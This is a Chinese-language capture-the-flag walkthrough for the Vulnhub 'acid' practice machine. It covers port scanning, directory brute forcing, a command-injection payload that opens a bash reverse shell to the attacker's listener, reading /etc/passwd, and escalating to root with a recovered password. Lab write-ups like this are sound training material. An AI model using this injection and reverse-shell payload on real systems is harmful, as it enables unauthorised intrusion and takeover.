Vulnhub靶场 acid
目标:
获得root权限和flag
运行环境:
靶机配置:该虚拟机完全基于Web,提取rar并使用VMplayer运行vmx,网络连接方式设置为net,靶机自动获取IP。
攻击机配置:同网段下有Windows攻击机,安装有Burpsuit、nc、Python2.7、DirBuster、御剑等渗透工具。
1.使用nmap扫描VMware Network Adapter VMnet8 网段
2.获得ip进入主页
3.并且发现端口:Tcp 33447
4.底层服务:Apache2.4.10
5.操作系统:Ubuntu
6.在查看源代码并且解码后得到
7.http://192.168.238.136:33447/images/wow.jpg 猜测图片文件夹为images
8.将图片保存并且用notepad++打开发现了一串加密代码
9.发现是ascll 码,解密后发现为md5再次解密发现了一串数字 63425
10.通过Dirbuster进行目录爆破最终找到了可以执行命令的目录
11.通过burp进行抓包然后发送到重发模块重发,并且开启nc 监听端口 nc -lvn 4444
在post gat 下payload 需要进行url编码.
127.0.0.1&&echo “bash -i >& /dev/tcp/192.168.238.1/4444 0>&1” | bash
编码后重发得到shell
12.输入 python -c ‘import pty;pty.spawn("/bin/bash")’
得到一个交互式的shell
13.查看有哪些的用户 cat /etc/passwd
14.一般查看 id 大于1000的
15.find / -user acid 2>/dev/null 查找用户文件
16.发现一个流量包/sbin/raw_vs_isi/hint.pcapng
17.于是通关python搭建临时服务器命令:
cd /sbin/raw_vs_isi
python -m SimpleHTTPServer 8888
18.浏览器192.168.238.136:8888 将流量包下载到本地并且用
Wireshark打开查找密码
19.su -saman 切换并输入密码:1337hax0r
20.sudo -i 尝试提权并查找flag.txt